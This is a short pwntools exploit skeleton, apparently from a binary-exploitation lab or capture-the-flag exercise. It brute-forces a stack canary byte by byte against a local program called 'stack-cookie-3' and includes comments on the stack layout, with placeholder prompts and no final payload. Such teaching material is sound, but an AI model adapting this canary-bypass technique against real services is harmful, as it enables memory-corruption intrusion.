#!/usr/bin/env python

from pwn import *

p = process('./stack-cookie-3')


def checking(p: process, buf: bytes) -> bytes:
    """
    cookie checker
    """

    # read upto some points...
    o = p.recvuntil("???")

    for i in range(0, 256):
        # Send the length of the data that we will send.
        # We will guess 1 more byte than 0x80 + cookie,
        # because our buffer starts at -0x8c(%ebp),
        # and the cookie is at -0xc(%ebp)
        # [ BUFFER (0x80) ] [Cookie] [XXXX] [YYYY] [Saved ebp] [RET] ...
        p.sendline("???")

        # read upto some points...
        o = p.recvuntil("???")

        p.sendline(buf + bytes([i]))
        o = p.recvuntil("???")

        # send the current guess
        if b'stack smashing detected' in o:
            continue
        else:
            return bytes([i])
    else:
        raise Exception("Failed to find a match")


# please run `checking()` to get all four/eight byte of the cookie...

# please use the cookie to launch your exploit!